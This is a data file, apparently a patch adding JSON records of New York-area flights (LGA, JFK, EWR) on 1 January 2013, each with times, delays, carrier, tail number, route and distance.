+{"year":2013,"month":1,"day":1,"dep_time":753,"sched_dep_time":755,"dep_delay":-2,"arr_time":1056,"sched_arr_time":1110,"arr_delay":-14,"carrier":"AA","flight":2267,"tailnum":"N3HMAA","origin":"LGA","dest":"MIA","air_time":157,"distance":1096,"hour":7,"minute":55,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":754,"sched_dep_time":759,"dep_delay":-5,"arr_time":1039,"sched_arr_time":1041,"arr_delay":-2,"carrier":"DL","flight":2047,"tailnum":"N935DL","origin":"LGA","dest":"ATL","air_time":126,"distance":762,"hour":7,"minute":59,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":754,"sched_dep_time":755,"dep_delay":-1,"arr_time":1103,"sched_arr_time":1030,"arr_delay":33,"carrier":"WN","flight":733,"tailnum":"N789SW","origin":"LGA","dest":"DEN","air_time":279,"distance":1620,"hour":7,"minute":55,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":758,"sched_dep_time":800,"dep_delay":-2,"arr_time":1053,"sched_arr_time":1054,"arr_delay":-1,"carrier":"B6","flight":517,"tailnum":"N645JB","origin":"EWR","dest":"MCO","air_time":142,"distance":937,"hour":8,"minute":0,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":759,"sched_dep_time":800,"dep_delay":-1,"arr_time":1057,"sched_arr_time":1127,"arr_delay":-30,"carrier":"DL","flight":1843,"tailnum":"N955DL","origin":"JFK","dest":"MIA","air_time":158,"distance":1089,"hour":8,"minute":0,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":800,"sched_dep_time":800,"dep_delay":0,"arr_time":1022,"sched_arr_time":1014,"arr_delay":8,"carrier":"DL","flight":2119,"tailnum":"N317US","origin":"LGA","dest":"MSP","air_time":171,"distance":1020,"hour":8,"minute":0,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":800,"sched_dep_time":810,"dep_delay":-10,"arr_time":949,"sched_arr_time":955,"arr_delay":-6,"carrier":"MQ","flight":4406,"tailnum":"N828MQ","origin":"JFK","dest":"RDU","air_time":80,"distance":427,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":801,"sched_dep_time":805,"dep_delay":-4,"arr_time":900,"sched_arr_time":919,"arr_delay":-19,"carrier":"B6","flight":1172,"tailnum":"N206JB","origin":"EWR","dest":"BOS","air_time":38,"distance":200,"hour":8,"minute":5,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":803,"sched_dep_time":810,"dep_delay":-7,"arr_time":903,"sched_arr_time":925,"arr_delay":-22,"carrier":"AA","flight":1838,"tailnum":"N3GEAA","origin":"JFK","dest":"BOS","air_time":38,"distance":187,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":803,"sched_dep_time":800,"dep_delay":3,"arr_time":1132,"sched_arr_time":1144,"arr_delay":-12,"carrier":"UA","flight":223,"tailnum":"N510UA","origin":"JFK","dest":"SFO","air_time":369,"distance":2586,"hour":8,"minute":0,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":804,"sched_dep_time":810,"dep_delay":-6,"arr_time":1103,"sched_arr_time":1116,"arr_delay":-13,"carrier":"DL","flight":1959,"tailnum":"N947DL","origin":"JFK","dest":"MCO","air_time":147,"distance":944,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":805,"sched_dep_time":805,"dep_delay":0,"arr_time":1015,"sched_arr_time":1005,"arr_delay":10,"carrier":"B6","flight":219,"tailnum":"N273JB","origin":"JFK","dest":"CLT","air_time":98,"distance":541,"hour":8,"minute":5,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":805,"sched_dep_time":800,"dep_delay":5,"arr_time":1118,"sched_arr_time":1106,"arr_delay":12,"carrier":"B6","flight":3,"tailnum":"N570JB","origin":"JFK","dest":"FLL","air_time":165,"distance":1069,"hour":8,"minute":0,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":805,"sched_dep_time":815,"dep_delay":-10,"arr_time":1006,"sched_arr_time":1010,"arr_delay":-4,"carrier":"MQ","flight":4490,"tailnum":"N739MQ","origin":"LGA","dest":"CMH","air_time":101,"distance":479,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":807,"sched_dep_time":810,"dep_delay":-3,"arr_time":1043,"sched_arr_time":1043,"arr_delay":0,"carrier":"DL","flight":269,"tailnum":"N308DE","origin":"JFK","dest":"ATL","air_time":126,"distance":760,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":809,"sched_dep_time":815,"dep_delay":-6,"arr_time":1043,"sched_arr_time":1050,"arr_delay":-7,"carrier":"EV","flight":4388,"tailnum":"N14542","origin":"EWR","dest":"JAX","air_time":132,"distance":820,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":810,"sched_dep_time":810,"dep_delay":0,"arr_time":1048,"sched_arr_time":1037,"arr_delay":11,"carrier":"9E","flight":3538,"tailnum":"N915XJ","origin":"JFK","dest":"MSP","air_time":189,"distance":1029,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":810,"sched_dep_time":815,"dep_delay":-5,"arr_time":1100,"sched_arr_time":1128,"arr_delay":-28,"carrier":"DL","flight":2395,"tailnum":"N349NW","origin":"LGA","dest":"PBI","air_time":149,"distance":1035,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":811,"sched_dep_time":815,"dep_delay":-4,"arr_time":1006,"sched_arr_time":1032,"arr_delay":-26,"carrier":"EV","flight":4260,"tailnum":"N11193","origin":"EWR","dest":"CHS","air_time":101,"distance":628,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":811,"sched_dep_time":630,"dep_delay":101,"arr_time":1047,"sched_arr_time":830,"arr_delay":137,"carrier":"MQ","flight":4576,"tailnum":"N531MQ","origin":"LGA","dest":"CLT","air_time":118,"distance":544,"hour":6,"minute":30,"time_hour":"2013-01-01 06:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":811,"sched_dep_time":815,"dep_delay":-4,"arr_time":1026,"sched_arr_time":1016,"arr_delay":10,"carrier":"US","flight":675,"tailnum":"N654AW","origin":"EWR","dest":"CLT","air_time":96,"distance":529,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":812,"sched_dep_time":814,"dep_delay":-2,"arr_time":1040,"sched_arr_time":1017,"arr_delay":23,"carrier":"EV","flight":4537,"tailnum":"N17108","origin":"EWR","dest":"MEM","air_time":180,"distance":946,"hour":8,"minute":14,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":813,"sched_dep_time":815,"dep_delay":-2,"arr_time":1103,"sched_arr_time":1056,"arr_delay":7,"carrier":"DL","flight":914,"tailnum":"N375NC","origin":"LGA","dest":"DEN","air_time":267,"distance":1620,"hour":8,"minute":15,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":814,"sched_dep_time":810,"dep_delay":4,"arr_time":1047,"sched_arr_time":1030,"arr_delay":17,"carrier":"FL","flight":346,"tailnum":"N977AT","origin":"LGA","dest":"ATL","air_time":132,"distance":762,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":817,"sched_dep_time":810,"dep_delay":7,"arr_time":1005,"sched_arr_time":948,"arr_delay":17,"carrier":"B6","flight":1051,"tailnum":"N228JB","origin":"JFK","dest":"PIT","air_time":86,"distance":340,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":820,"sched_dep_time":820,"dep_delay":0,"arr_time":1254,"sched_arr_time":1310,"arr_delay":-16,"carrier":"B6","flight":717,"tailnum":"N527JB","origin":"JFK","dest":"SJU","air_time":190,"distance":1598,"hour":8,"minute":20,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":820,"sched_dep_time":830,"dep_delay":-10,"arr_time":940,"sched_arr_time":954,"arr_delay":-14,"carrier":"DL","flight":27,"tailnum":"N324US","origin":"JFK","dest":"BOS","air_time":36,"distance":187,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":820,"sched_dep_time":820,"dep_delay":0,"arr_time":1249,"sched_arr_time":1329,"arr_delay":-40,"carrier":"DL","flight":301,"tailnum":"N900PC","origin":"JFK","dest":"SJU","air_time":182,"distance":1598,"hour":8,"minute":20,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":821,"sched_dep_time":820,"dep_delay":1,"arr_time":1153,"sched_arr_time":1129,"arr_delay":24,"carrier":"B6","flight":181,"tailnum":"N521JB","origin":"JFK","dest":"SAN","air_time":354,"distance":2446,"hour":8,"minute":20,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":821,"sched_dep_time":825,"dep_delay":-4,"arr_time":932,"sched_arr_time":945,"arr_delay":-13,"carrier":"MQ","flight":4418,"tailnum":"N846MQ","origin":"JFK","dest":"DCA","air_time":52,"distance":213,"hour":8,"minute":25,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":822,"sched_dep_time":830,"dep_delay":-8,"arr_time":1014,"sched_arr_time":1016,"arr_delay":-2,"carrier":"EV","flight":4104,"tailnum":"N12540","origin":"LGA","dest":"CLE","air_time":91,"distance":419,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":823,"sched_dep_time":825,"dep_delay":-2,"arr_time":1019,"sched_arr_time":1024,"arr_delay":-5,"carrier":"US","flight":487,"tailnum":"N655AW","origin":"JFK","dest":"CLT","air_time":96,"distance":541,"hour":8,"minute":25,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":823,"sched_dep_time":823,"dep_delay":0,"arr_time":1151,"sched_arr_time":1135,"arr_delay":16,"carrier":"UA","flight":1223,"tailnum":"N39728","origin":"EWR","dest":"DFW","air_time":250,"distance":1372,"hour":8,"minute":23,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":824,"sched_dep_time":830,"dep_delay":-6,"arr_time":1027,"sched_arr_time":1025,"arr_delay":2,"carrier":"AA","flight":1855,"tailnum":"N573AA","origin":"LGA","dest":"STL","air_time":169,"distance":888,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":825,"sched_dep_time":827,"dep_delay":-2,"arr_time":1058,"sched_arr_time":1105,"arr_delay":-7,"carrier":"B6","flight":611,"tailnum":"N292JB","origin":"JFK","dest":"JAX","air_time":130,"distance":828,"hour":8,"minute":27,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":826,"sched_dep_time":715,"dep_delay":71,"arr_time":1136,"sched_arr_time":1045,"arr_delay":51,"carrier":"AA","flight":443,"tailnum":"N3GVAA","origin":"JFK","dest":"MIA","air_time":160,"distance":1089,"hour":7,"minute":15,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":826,"sched_dep_time":817,"dep_delay":9,"arr_time":1145,"sched_arr_time":1158,"arr_delay":-13,"carrier":"UA","flight":1480,"tailnum":"N76522","origin":"EWR","dest":"SFO","air_time":357,"distance":2565,"hour":8,"minute":17,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":828,"sched_dep_time":830,"dep_delay":-2,"arr_time":1027,"sched_arr_time":1012,"arr_delay":15,"carrier":"B6","flight":905,"tailnum":"N274JB","origin":"JFK","dest":"ORD","air_time":160,"distance":740,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":828,"sched_dep_time":823,"dep_delay":5,"arr_time":1150,"sched_arr_time":1143,"arr_delay":7,"carrier":"UA","flight":1506,"tailnum":"N76528","origin":"EWR","dest":"LAX","air_time":359,"distance":2454,"hour":8,"minute":23,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":829,"sched_dep_time":830,"dep_delay":-1,"arr_time":1152,"sched_arr_time":1200,"arr_delay":-8,"carrier":"UA","flight":443,"tailnum":"N554UA","origin":"JFK","dest":"LAX","air_time":360,"distance":2475,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":829,"sched_dep_time":830,"dep_delay":-1,"arr_time":1117,"sched_arr_time":1140,"arr_delay":-23,"carrier":"UA","flight":1592,"tailnum":"N75425","origin":"EWR","dest":"MCO","air_time":145,"distance":937,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":830,"sched_dep_time":830,"dep_delay":0,"arr_time":1018,"sched_arr_time":1015,"arr_delay":3,"carrier":"AA","flight":313,"tailnum":"N4YCAA","origin":"LGA","dest":"ORD","air_time":137,"distance":733,"hour":8,"minute":30,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":830,"sched_dep_time":835,"dep_delay":-5,"arr_time":1052,"sched_arr_time":1105,"arr_delay":-13,"carrier":"MQ","flight":4610,"tailnum":"N513MQ","origin":"LGA","dest":"ATL","air_time":123,"distance":762,"hour":8,"minute":35,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":831,"sched_dep_time":835,"dep_delay":-4,"arr_time":1021,"sched_arr_time":1039,"arr_delay":-18,"carrier":"EV","flight":4412,"tailnum":"N13969","origin":"EWR","dest":"MYR","air_time":92,"distance":550,"hour":8,"minute":35,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":832,"sched_dep_time":840,"dep_delay":-8,"arr_time":1006,"sched_arr_time":1030,"arr_delay":-24,"carrier":"MQ","flight":4521,"tailnum":"N725MQ","origin":"LGA","dest":"RDU","air_time":77,"distance":431,"hour":8,"minute":40,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":833,"sched_dep_time":835,"dep_delay":-2,"arr_time":1134,"sched_arr_time":1102,"arr_delay":32,"carrier":"F9","flight":835,"tailnum":"N203FR","origin":"LGA","dest":"DEN","air_time":257,"distance":1620,"hour":8,"minute":35,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":835,"sched_dep_time":835,"dep_delay":0,"arr_time":1210,"sched_arr_time":1150,"arr_delay":20,"carrier":"AA","flight":717,"tailnum":"N3BDAA","origin":"LGA","dest":"DFW","air_time":249,"distance":1389,"hour":8,"minute":35,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":839,"sched_dep_time":850,"dep_delay":-11,"arr_time":1027,"sched_arr_time":1035,"arr_delay":-8,"carrier":"MQ","flight":4558,"tailnum":"N711MQ","origin":"LGA","dest":"CLE","air_time":88,"distance":419,"hour":8,"minute":50,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":840,"sched_dep_time":845,"dep_delay":-5,"arr_time":1311,"sched_arr_time":1350,"arr_delay":-39,"carrier":"AA","flight":1357,"tailnum":"N5FSAA","origin":"JFK","dest":"SJU","air_time":188,"distance":1598,"hour":8,"minute":45,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":840,"sched_dep_time":845,"dep_delay":-5,"arr_time":1053,"sched_arr_time":1102,"arr_delay":-9,"carrier":"DL","flight":2304,"tailnum":"N926DL","origin":"JFK","dest":"DTW","air_time":108,"distance":509,"hour":8,"minute":45,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":846,"sched_dep_time":845,"dep_delay":1,"arr_time":1138,"sched_arr_time":1205,"arr_delay":-27,"carrier":"B6","flight":553,"tailnum":"N564JB","origin":"EWR","dest":"RSW","air_time":157,"distance":1068,"hour":8,"minute":45,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":848,"sched_dep_time":1835,"dep_delay":853,"arr_time":1001,"sched_arr_time":1950,"arr_delay":851,"carrier":"MQ","flight":3944,"tailnum":"N942MQ","origin":"JFK","dest":"BWI","air_time":41,"distance":184,"hour":18,"minute":35,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":848,"sched_dep_time":851,"dep_delay":-3,"arr_time":1155,"sched_arr_time":1136,"arr_delay":19,"carrier":"UA","flight":1741,"tailnum":"N27724","origin":"EWR","dest":"JAC","air_time":275,"distance":1874,"hour":8,"minute":51,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":851,"sched_dep_time":851,"dep_delay":0,"arr_time":1032,"sched_arr_time":1036,"arr_delay":-4,"carrier":"EV","flight":4548,"tailnum":"N19966","origin":"EWR","dest":"RDU","air_time":75,"distance":416,"hour":8,"minute":51,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":851,"sched_dep_time":859,"dep_delay":-8,"arr_time":1102,"sched_arr_time":1105,"arr_delay":-3,"carrier":"DL","flight":869,"tailnum":"N361NB","origin":"EWR","dest":"DTW","air_time":106,"distance":488,"hour":8,"minute":59,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":851,"sched_dep_time":840,"dep_delay":11,"arr_time":1215,"sched_arr_time":1206,"arr_delay":9,"carrier":"UA","flight":1626,"tailnum":"N39297","origin":"EWR","dest":"SAN","air_time":367,"distance":2425,"hour":8,"minute":40,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":852,"sched_dep_time":855,"dep_delay":-3,"arr_time":1046,"sched_arr_time":1020,"arr_delay":26,"carrier":"WN","flight":3848,"tailnum":"N777QC","origin":"EWR","dest":"MDW","air_time":146,"distance":711,"hour":8,"minute":55,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":853,"sched_dep_time":845,"dep_delay":8,"arr_time":1147,"sched_arr_time":1145,"arr_delay":2,"carrier":"B6","flight":59,"tailnum":"N184JB","origin":"JFK","dest":"TPA","air_time":159,"distance":1005,"hour":8,"minute":45,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":855,"sched_dep_time":859,"dep_delay":-4,"arr_time":1143,"sched_arr_time":1145,"arr_delay":-2,"carrier":"DL","flight":1747,"tailnum":"N646DL","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":8,"minute":59,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":856,"sched_dep_time":900,"dep_delay":-4,"arr_time":1226,"sched_arr_time":1220,"arr_delay":6,"carrier":"AA","flight":1,"tailnum":"N324AA","origin":"JFK","dest":"LAX","air_time":358,"distance":2475,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":856,"sched_dep_time":900,"dep_delay":-4,"arr_time":1222,"sched_arr_time":1232,"arr_delay":-10,"carrier":"DL","flight":2143,"tailnum":"N970DL","origin":"LGA","dest":"MIA","air_time":158,"distance":1096,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":856,"sched_dep_time":855,"dep_delay":1,"arr_time":1140,"sched_arr_time":1203,"arr_delay":-23,"carrier":"UA","flight":1296,"tailnum":"N75426","origin":"EWR","dest":"PBI","air_time":150,"distance":1023,"hour":8,"minute":55,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":857,"sched_dep_time":900,"dep_delay":-3,"arr_time":1516,"sched_arr_time":1530,"arr_delay":-14,"carrier":"HA","flight":51,"tailnum":"N380HA","origin":"JFK","dest":"HNL","air_time":659,"distance":4983,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":857,"sched_dep_time":905,"dep_delay":-8,"arr_time":1107,"sched_arr_time":1120,"arr_delay":-13,"carrier":"DL","flight":181,"tailnum":"N321NB","origin":"LGA","dest":"DTW","air_time":110,"distance":502,"hour":9,"minute":5,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":857,"sched_dep_time":900,"dep_delay":-3,"arr_time":1124,"sched_arr_time":1133,"arr_delay":-9,"carrier":"DL","flight":485,"tailnum":"N371NB","origin":"EWR","dest":"ATL","air_time":125,"distance":746,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":857,"sched_dep_time":851,"dep_delay":6,"arr_time":1157,"sched_arr_time":1222,"arr_delay":-25,"carrier":"UA","flight":1670,"tailnum":"N45440","origin":"EWR","dest":"SEA","air_time":343,"distance":2402,"hour":8,"minute":51,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":858,"sched_dep_time":900,"dep_delay":-2,"arr_time":1102,"sched_arr_time":1110,"arr_delay":-8,"carrier":"MQ","flight":4478,"tailnum":"N737MQ","origin":"LGA","dest":"DTW","air_time":103,"distance":502,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":859,"sched_dep_time":900,"dep_delay":-1,"arr_time":1140,"sched_arr_time":1204,"arr_delay":-24,"carrier":"DL","flight":1885,"tailnum":"N360NB","origin":"LGA","dest":"MCO","air_time":140,"distance":950,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":859,"sched_dep_time":900,"dep_delay":-1,"arr_time":1223,"sched_arr_time":1225,"arr_delay":-2,"carrier":"VX","flight":407,"tailnum":"N846VA","origin":"JFK","dest":"LAX","air_time":359,"distance":2475,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":900,"sched_dep_time":900,"dep_delay":0,"arr_time":1211,"sched_arr_time":1203,"arr_delay":8,"carrier":"UA","flight":1170,"tailnum":"N19130","origin":"EWR","dest":"FLL","air_time":161,"distance":1065,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":902,"sched_dep_time":903,"dep_delay":-1,"arr_time":1048,"sched_arr_time":1045,"arr_delay":3,"carrier":"UA","flight":580,"tailnum":"N820UA","origin":"EWR","dest":"ORD","air_time":145,"distance":719,"hour":9,"minute":3,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":903,"sched_dep_time":820,"dep_delay":43,"arr_time":1045,"sched_arr_time":955,"arr_delay":50,"carrier":"MQ","flight":4655,"tailnum":"N532MQ","origin":"LGA","dest":"BNA","air_time":142,"distance":764,"hour":8,"minute":20,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":904,"sched_dep_time":906,"dep_delay":-2,"arr_time":1207,"sched_arr_time":1226,"arr_delay":-19,"carrier":"UA","flight":1401,"tailnum":"N77525","origin":"EWR","dest":"MIA","air_time":158,"distance":1085,"hour":9,"minute":6,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":905,"sched_dep_time":905,"dep_delay":0,"arr_time":1309,"sched_arr_time":1229,"arr_delay":40,"carrier":"B6","flight":1061,"tailnum":"N281JB","origin":"JFK","dest":"AUS","air_time":263,"distance":1521,"hour":9,"minute":5,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":906,"sched_dep_time":843,"dep_delay":23,"arr_time":1134,"sched_arr_time":1125,"arr_delay":9,"carrier":"UA","flight":1643,"tailnum":"N17139","origin":"EWR","dest":"DEN","air_time":246,"distance":1605,"hour":8,"minute":43,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":908,"sched_dep_time":910,"dep_delay":-2,"arr_time":1020,"sched_arr_time":1027,"arr_delay":-7,"carrier":"B6","flight":56,"tailnum":"N203JB","origin":"JFK","dest":"BTV","air_time":52,"distance":266,"hour":9,"minute":10,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":908,"sched_dep_time":915,"dep_delay":-7,"arr_time":1004,"sched_arr_time":1033,"arr_delay":-29,"carrier":"US","flight":1467,"tailnum":"N959UW","origin":"LGA","dest":"PHL","air_time":32,"distance":96,"hour":9,"minute":15,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":908,"sched_dep_time":908,"dep_delay":0,"arr_time":1228,"sched_arr_time":1219,"arr_delay":9,"carrier":"UA","flight":1220,"tailnum":"N12216","origin":"EWR","dest":"IAH","air_time":233,"distance":1400,"hour":9,"minute":8,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":909,"sched_dep_time":810,"dep_delay":59,"arr_time":1331,"sched_arr_time":1315,"arr_delay":16,"carrier":"AA","flight":655,"tailnum":"N5EXAA","origin":"JFK","dest":"STT","air_time":184,"distance":1623,"hour":8,"minute":10,"time_hour":"2013-01-01 08:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":912,"sched_dep_time":900,"dep_delay":12,"arr_time":1241,"sched_arr_time":1220,"arr_delay":21,"carrier":"AA","flight":647,"tailnum":"N5CRAA","origin":"JFK","dest":"MIA","air_time":166,"distance":1089,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":912,"sched_dep_time":906,"dep_delay":6,"arr_time":1219,"sched_arr_time":1226,"arr_delay":-7,"carrier":"UA","flight":1601,"tailnum":"N38403","origin":"EWR","dest":"MIA","air_time":159,"distance":1085,"hour":9,"minute":6,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":913,"sched_dep_time":918,"dep_delay":-5,"arr_time":1346,"sched_arr_time":1416,"arr_delay":-30,"carrier":"UA","flight":1519,"tailnum":"N24715","origin":"EWR","dest":"STT","air_time":189,"distance":1634,"hour":9,"minute":18,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":914,"sched_dep_time":920,"dep_delay":-6,"arr_time":1244,"sched_arr_time":1240,"arr_delay":4,"carrier":"AA","flight":1589,"tailnum":"N517AA","origin":"EWR","dest":"DFW","air_time":238,"distance":1372,"hour":9,"minute":20,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":914,"sched_dep_time":900,"dep_delay":14,"arr_time":1058,"sched_arr_time":1043,"arr_delay":15,"carrier":"UA","flight":783,"tailnum":"N810UA","origin":"EWR","dest":"CLE","air_time":85,"distance":404,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":917,"sched_dep_time":920,"dep_delay":-3,"arr_time":1313,"sched_arr_time":1245,"arr_delay":28,"carrier":"AA","flight":721,"tailnum":"N596AA","origin":"LGA","dest":"DFW","air_time":258,"distance":1389,"hour":9,"minute":20,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":917,"sched_dep_time":915,"dep_delay":2,"arr_time":1206,"sched_arr_time":1211,"arr_delay":-5,"carrier":"B6","flight":41,"tailnum":"N568JB","origin":"JFK","dest":"MCO","air_time":145,"distance":944,"hour":9,"minute":15,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":917,"sched_dep_time":920,"dep_delay":-3,"arr_time":1052,"sched_arr_time":1108,"arr_delay":-16,"carrier":"B6","flight":1103,"tailnum":"N216JB","origin":"JFK","dest":"RDU","air_time":80,"distance":427,"hour":9,"minute":20,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":920,"sched_dep_time":905,"dep_delay":15,"arr_time":1039,"sched_arr_time":1025,"arr_delay":14,"carrier":"B6","flight":1305,"tailnum":"N346JB","origin":"JFK","dest":"IAD","air_time":52,"distance":228,"hour":9,"minute":5,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":920,"sched_dep_time":920,"dep_delay":0,"arr_time":1152,"sched_arr_time":1125,"arr_delay":27,"carrier":"MQ","flight":4582,"tailnum":"N527MQ","origin":"LGA","dest":"CLT","air_time":92,"distance":544,"hour":9,"minute":20,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":921,"sched_dep_time":900,"dep_delay":21,"arr_time":1237,"sched_arr_time":1227,"arr_delay":10,"carrier":"DL","flight":120,"tailnum":"N713TW","origin":"JFK","dest":"LAX","air_time":333,"distance":2475,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} 